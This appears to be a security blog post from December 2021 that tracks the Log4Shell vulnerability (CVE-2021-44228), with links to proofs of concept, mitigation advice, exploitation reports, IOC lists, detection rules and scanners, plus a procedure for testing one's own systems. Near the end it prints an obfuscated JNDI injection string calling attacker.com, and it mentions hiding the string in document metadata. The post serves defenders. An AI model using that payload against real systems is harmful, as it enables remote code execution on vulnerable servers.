[ SB 21.21 ] Log4J - RCE (CVE-2021-44228)

A 0-day exploit in the popular Java logging library log4j was released) that results in Remote Code Execution (RCE) by logging a certain string.

Meanwhile, CVE-2021-44228 was assigned and updates had been released.

Currently it is not 100% sure if what we know by now (2021-12-10 11:00 AM UTC) about the attackvector, exploitation and impact is complete or not.

We try to keep up with latest events and developments with this post, but we share the estimation by Florian Roth, that this vuln is on ShellShock-Level.

POCs

tl;dr: as time goes by, more and more specific POCs for affected applications will emerge, current state is mostly spray-and-pray (2021-12-12)

• various POCs emerged everywhere

• https://github.com/tangxiaofeng7/apache-log4j-poc

• 2021-12-10 15.00 UTC -> Scanning-activities

• Repro'd the attack in a few different scenarios. Yeah, it's pretty bad.

Mitigation

besides mitigating the risk via upgrades (2.16 is the way to go), your egress-fw is a good point for mitigation

• #log4j Mitigation good/better/best

attacksurface and impact

tl;dr: its bad. its worse. we just know the tip of the iceberg yet.

• probably the most complete list of software that is (or not) affected by the Log4Shell vulnerability from the Dutch National Cyber Security Center (NCSC-NL)

• blind gues for jsessionid shows more than 1 mio devices

• For those that are trying to keep up, the log4j JNDI injection is probably pre-auth RCE on approx ~90% of your Java apps. You wanna patch this one.

• CIRCL.lu Just checking @github dependencies it's already 1844 repositories.

• additional vectors:

• "Server’s running on JDKs versions higher than 6u141, 7u131, 8u121 are not affected by the LDAP attack vector," is incorrect, if anything, those versions protect from the RMI vector. LDAP vector leading to unsafe deserialization and RCE affects ALL versions!

outdated

• BlueTeam CheatSheet * #Log4Shell CVE-2021-44228*

• You can put the #Log4Shell string into the metadata of a word doc, drop it on a network file share, & wait.

MassExploitation

tl;dr: yes.

• BadPackets: Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j

• Greynoise: Count of hosts exploiting CVE-2021-44228 has increased from 100 to 150 in several hours. Please find gists w/ IPs exploiting this vulnerability at scale + C2 callback domains.
  IPs exploiting the vuln at scale | Callback Domains log4j

• Cloudflare: Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC. That suggests it was in the wild at least 9 days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.

• #Log4J based on what I've seen, there is evidence that a worm will be developed for this in the next 24 to 48 hours.

• ransomware has arrived

exploitation-detection + DFIR

tl;dr: difficult, YMMV, it might be helpfull to check your fw-logs ingress/egress against IOC-lists, because you will find attempts in your logfiles anyway.

• florian roth: Gist with exploitation detection ideas and rules

• Florian Roth Update on what we know so far (Exploitation, Detection, Mitigation) as of 2021-12-11 11am UTC

• Fenrir v0.9 - Log4Shell Release - Bash based IOC scanner to walk over a complete file system

• Log4Shell-Exploitation-Detector

• Post Mortem: Lets do a Ten Minute Triage of a honeypot Apache Solr box that got popped with the #Log4J / #Log4Shell exploit #CVE-2021-44228

• PSA: attackers aren't just using #log4j attacks on internet facing devices. Groups I'm monitoring are going back to compromised networks and using it on subnets and on internal devices very successfully

• VCenter log4j , it's the X-Forwarded-For header. Probably applicable on other VMware products.

• bypasses, bypasses everywhere

• #Log4J Data Exfiltration & Env Var List

• Snort/Suricata-Rules

• NCC: Log4Shell: Reconnaissance and post exploitation network detection

IOCs

• Greynoise: Please find the following raw CVE-2021-44228 Log4J / Logshell payloads GreyNoise has detected thus far.

• Greynoise: Payloads

• Greynoise: Due to the severity of this vulnerability, we are going to regularly updating the IPs that have been tagged as exploiting Apache Log4J CVE-2021-44228 for non-GreyNoise users. Thread for updates: here

• IPs seen in attacks: Watch out: 45_155_205_233 actively exploiting CVE-2021-44228 (Log4j/Shell) - thread with more IPs for stage 2 and exploitation

• Crowdsc-IOCs and IPs

• Curated-Intel Log4Shell-IOCs Metalist

• CriticalPath-IOCs

dns-IOCs for "those usual" scans

• canarytoken.com , scanner
• interactsh.com (nuclei, scanner)
• ceye.io (dns, scanner)
• dnslog.cn, scanner
• bingsearchlib.com malicious c2-domain (deactivated)
• burpsuitecollaborator.net (scanner)
• dnspod.cn (dns, scanner)

if you see those, take action

scans and tests

local scans are highly recommended, if possible

• local log4j-scanner

• google / log4jscanner

• another local log4j-finder, no dependencies

• local CERTCC/CVE-2021-44228_scanner

• local scanner by yahoo-team

vuln-testing-advice: scanning IPs is not sufficiant, think software that is reachable by hostnames (http://jira.example.com) or sits in/at the end of a comms-chain (email-sandbox, IDS/IPS/SIEM, logging-systems, accounting etc

measure your attacksurface

• hrafna, a log4j-scanner for the masses, using your own DNS/Bind

• It's difficult to find vulnerable software. It could be the web app, the ticket mgmt that receives contact form content or the backup software. Vuln scanners won't give a complete picture.

• How to test your apps for #log4shell vulnerability

• Payload-Samples by Greynoise

the following way works well for checking your own systems:

• get a complete list of internet-facing IPs (and hostnames); attacksurface-monitoring comes in handy
• if not sure about a complete list of hostnames, goto securitytrails and extract all hostnames and associated IPs for your domain and all associated hostnames for your IPs via their API (it will cost you 500 $, but better pay this than days of DFIR)
• goto https://canarytokens.org and generate a dns-token (shootout to Florian Roth for this receipt
• enable DNS-logs, you must be able to search for which host made nameresolutions. you will get a callback from a dns-server and see its ip, not the vulnerable hosts
• use any external testscript/tool or this modified nuclei-scanfile and the canarytoken_dnshostname for payload
• run your script against all IPs and hostnames, and monitor your emails
• check the dns-logs for the canarytoken-hostname-resolution to find callbacks and affected systems, because the callback might get blocked or executed by another system
• if you dont have hits, check twitter for updated external scanning-tools
• beware of sideffects

best attackpattern so far:

${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}

References

• gossi-thread
• reddit-meta: Log4j 0day being exploited